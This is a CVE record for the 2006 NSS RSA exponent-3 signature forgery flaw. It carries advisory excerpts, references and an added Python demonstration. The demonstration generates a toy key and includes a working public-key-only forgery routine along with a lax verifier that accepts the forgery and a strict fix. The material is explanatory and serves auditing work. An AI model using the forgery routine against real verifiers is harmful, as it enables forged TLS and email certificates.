
CVE-2006-4340

Published: 15/09/2006 Updated: 07/11/2023
CVSS v2 Base Score: 4 | Impact Score: 4.9 | Exploitability Score: 4.9
VMScore: 356
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:N

Vulnerability Summary

The Mozilla Network Security Services (NSS) library before 3.11.3, as used in Mozilla Firefox before 1.5.0.7, Thunderbird before 1.5.0.7, and SeaMonkey before 1.0.5, does not properly handle extra data in a signature block when verifying against an RSA key with public exponent 3. This allows remote attackers to forge signatures on SSL/TLS and email certificates. It is a similar vulnerability to CVE-2006-4339 (the OpenSSL instance of the same flaw). NOTE: on 2006-11-07, Mozilla released an advisory stating that these versions were not completely patched by MFSA 2006-60; the newer fixes for 1.5.0.7 are covered by CVE-2006-5462.
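The forgery behind this summary is Bleichenbacher's e=3 attack on lax PKCS#1 v1.5 verification: a verifier that walks the 00 01 FF..FF 00 padding, matches the DigestInfo and then stops never notices that the block was shorter than the modulus and padded out with arbitrary bytes, so an attacker needs only the public key to build a "signature" whose cube lands on the right prefix. The following is an added example, not NSS code or anything from the Mozilla advisory. It assumes a Python 3.8+ interpreter; the e=3 key (generated in-script with a toy Miller-Rabin routine), the SHA-1 DigestInfo, the sample message and the two verifier variants are all constructed here for illustration.

```python
import hashlib
import hmac
import random

# DER prefix of the PKCS#1 v1.5 DigestInfo for SHA-1 (RFC 3447, section 9.2).
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")

def _is_probable_prime(n, rng, rounds=16):
    """Miller-Rabin: good enough for a demo key, not for real key generation."""
    if any(n % p == 0 for p in (3, 5, 7, 11, 13, 17, 19, 23, 29)):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _gen_prime(bits, rng):
    while True:
        c = rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # odd, full length
        if c % 3 == 2 and _is_probable_prime(c, rng):      # gcd(3, c-1) == 1
            return c

def make_e3_keypair(bits=1024, seed=4340):
    """Deterministic toy RSA key with e=3 (hypothetical key, generated here)."""
    rng = random.Random(seed)
    p, q = _gen_prime(bits // 2, rng), _gen_prime(bits // 2, rng)
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))

def _block_len(n):
    return (n.bit_length() + 7) // 8

def _digest_info(message):
    return SHA1_DIGESTINFO + hashlib.sha1(message).digest()

def _encode(message, k):
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 DigestInfo, filling the whole block."""
    t = _digest_info(message)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def _rsa(x, exp, n):
    return pow(int.from_bytes(x, "big"), exp, n).to_bytes(_block_len(n), "big")

def sign(message, n, d):
    return _rsa(_encode(message, _block_len(n)), d, n)

def verify_lax(message, sig, n, e):
    """The buggy pattern: walk the padding, match the DigestInfo, stop.
    Whatever follows the hash is never examined."""
    em = _rsa(sig, e, n)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    t = _digest_info(message)
    return em[i + 1:i + 1 + len(t)] == t  # trailing bytes ignored: the bug

def verify_strict(message, sig, n, e):
    """The fix: rebuild the full expected block and compare every byte."""
    return hmac.compare_digest(_rsa(sig, e, n), _encode(message, _block_len(n)))

def _icbrt(x):
    """Largest integer s with s**3 <= x."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= x else (lo, mid - 1)
    return lo

def forge_signature(message, n):
    """Public-key-only forgery for e=3: pick 00 01 FF 00 DigestInfo GARBAGE,
    take its integer cube root; s**3 < n so it never wraps modulo n and
    reproduces the prefix byte for byte."""
    k = _block_len(n)
    prefix = b"\x00\x01\xff\x00" + _digest_info(message)
    free = k - len(prefix)
    high = int.from_bytes(prefix + b"\xff" * free, "big")
    low = int.from_bytes(prefix + b"\x00" * free, "big")
    s = _icbrt(high)
    # The gap to the next cube (~3*s**2, about 2**675 for a 1024-bit n) is far
    # below the 2**(8*free) range of GARBAGE, so s**3 stays inside [low, high].
    assert low <= s ** 3 <= high, "block too small for this DigestInfo"
    return s.to_bytes(k, "big")

def demo(message=b"constructed sample message", bits=1024):
    """Genuine signature passes both checks; forgery passes only the lax one."""
    n, e, d = make_e3_keypair(bits)
    genuine, forged = sign(message, n, d), forge_signature(message, n)
    return {
        "genuine_strict": verify_strict(message, genuine, n, e),
        "genuine_lax": verify_lax(message, genuine, n, e),
        "forged_lax": verify_lax(message, forged, n, e),
        "forged_strict": verify_strict(message, forged, n, e),
    }

if __name__ == "__main__":
    print(demo())
```

Running the script prints `forged_lax` as True and `forged_strict` as False for the same bytes: the private key was never used to produce the forgery. When auditing a PKCS#1 v1.5 verifier, the property to look for is the one `verify_strict` has and `verify_lax` lacks: the verifier must account for every byte of the decrypted block (padding length included), not just locate a DigestInfo somewhere in it. Note that real verifiers also parse the DigestInfo ASN.1, and a lenient parser there gives the attacker another place to hide garbage; the fixed-prefix comparison above sidesteps that whole class.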

Vulnerable Products

Mozilla SeaMonkey

Mozilla Network Security Services (NSS)

Mozilla Firefox

Mozilla Thunderbird

Vendor Advisories

Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-2788 Fernando Ribeiro discovered that a vulnerability in the getRawDER function allows remote attackers to cause a denial of serv ...
Several security related problems have been discovered in Mozilla and derived products such as Mozilla Thunderbird. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-2788 Fernando Ribeiro discovered that a vulnerability in the getRawDER function allows remote attackers to cause a denial of ...
Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page containing JavaScript (CVE-2006-4253, CVE-2006-4565, CVE-2006-4566, CVE-2006-4568, CVE-2006-4569, CVE-2006-4571) ...
Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious URL (CVE-2006-2788, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3811, CVE-2006-4565, CVE-2006-4568, CVE-2006-4571) ...
This update upgrades Thunderbird from 1.0.8 to 1.5.0.7. This step was necessary since the 1.0.x series is not supported by upstream any more ...
Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious email containing JavaScript. Please note that JavaScript is disabled by default for emails, and it is not recommended to enable it (CVE-2006-4253, CVE-2006-4565, CVE-2006-4566, CVE-2006-4571) ...
Mozilla Foundation Security Advisory 2006-60: RSA Signature Forgery. Announced: September 14, 2006. Reporter: Philip Mackenzie, Marius Schilder. Impact: Critical. Products: Firefox, NSS, SeaMonkey, Thunderbird. Fixed in ...

References

CWE-20

http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html
http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/
http://www.redhat.com/support/errata/RHSA-2006-0676.html
http://www.redhat.com/support/errata/RHSA-2006-0677.html
http://secunia.com/advisories/21906
http://secunia.com/advisories/21949
http://www.redhat.com/support/errata/RHSA-2006-0675.html
http://securitytracker.com/id?1016858
http://securitytracker.com/id?1016859
http://securitytracker.com/id?1016860
http://secunia.com/advisories/21903
http://secunia.com/advisories/21915
http://secunia.com/advisories/21916
http://secunia.com/advisories/21939
http://secunia.com/advisories/21940
http://secunia.com/advisories/21950
ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc
http://www.ubuntu.com/usn/usn-350-1
http://secunia.com/advisories/22036
http://secunia.com/advisories/22001
http://security.gentoo.org/glsa/glsa-200609-19.xml
http://www.novell.com/linux/security/advisories/2006_54_mozilla.html
http://www.novell.com/linux/security/advisories/2006_55_ssl.html
http://www.ubuntu.com/usn/usn-351-1
http://www.ubuntu.com/usn/usn-352-1
http://www.ubuntu.com/usn/usn-354-1
http://secunia.com/advisories/22025
http://secunia.com/advisories/22055
http://secunia.com/advisories/22074
http://secunia.com/advisories/22088
http://www.us.debian.org/security/2006/dsa-1191
http://security.gentoo.org/glsa/glsa-200610-01.xml
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102648-1
http://secunia.com/advisories/22210
http://secunia.com/advisories/22226
http://secunia.com/advisories/22247
http://secunia.com/advisories/22274
http://support.avaya.com/elmodocs2/security/ASA-2006-224.htm
http://www.debian.org/security/2006/dsa-1192
http://www.gentoo.org/security/en/glsa/glsa-200610-06.xml
http://www.ubuntu.com/usn/usn-361-1
http://secunia.com/advisories/22299
http://secunia.com/advisories/22342
http://secunia.com/advisories/22422
http://secunia.com/advisories/22446
http://www.us-cert.gov/cas/techalerts/TA06-312A.html
http://www.debian.org/security/2006/dsa-1210
http://secunia.com/advisories/22849
http://secunia.com/advisories/22056
http://secunia.com/advisories/22195
http://support.avaya.com/elmodocs2/security/ASA-2006-250.htm
http://secunia.com/advisories/22992
https://issues.rpath.com/browse/RPL-640
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102781-1
http://secunia.com/advisories/23883
http://secunia.com/advisories/22044
http://secunia.com/advisories/24711
http://www.mandriva.com/security/advisories?name=MDKSA-2006:168
http://www.mandriva.com/security/advisories?name=MDKSA-2006:169
http://secunia.com/advisories/22066
http://www.vupen.com/english/advisories/2006/3617
http://www.vupen.com/english/advisories/2007/0293
http://www.vupen.com/english/advisories/2006/3748
http://www.vupen.com/english/advisories/2007/1198
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00771742
http://www.vupen.com/english/advisories/2008/0083
http://www.vupen.com/english/advisories/2006/3899
http://www.vupen.com/english/advisories/2006/3622
http://www.mozilla.org/security/announce/2006/mfsa2006-60.html
http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/30098
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11007
http://www.securityfocus.com/archive/1/446140/100/0/threaded
https://nvd.nist.gov
https://www.debian.org/security/./dsa-1210
https://usn.ubuntu.com/351-1/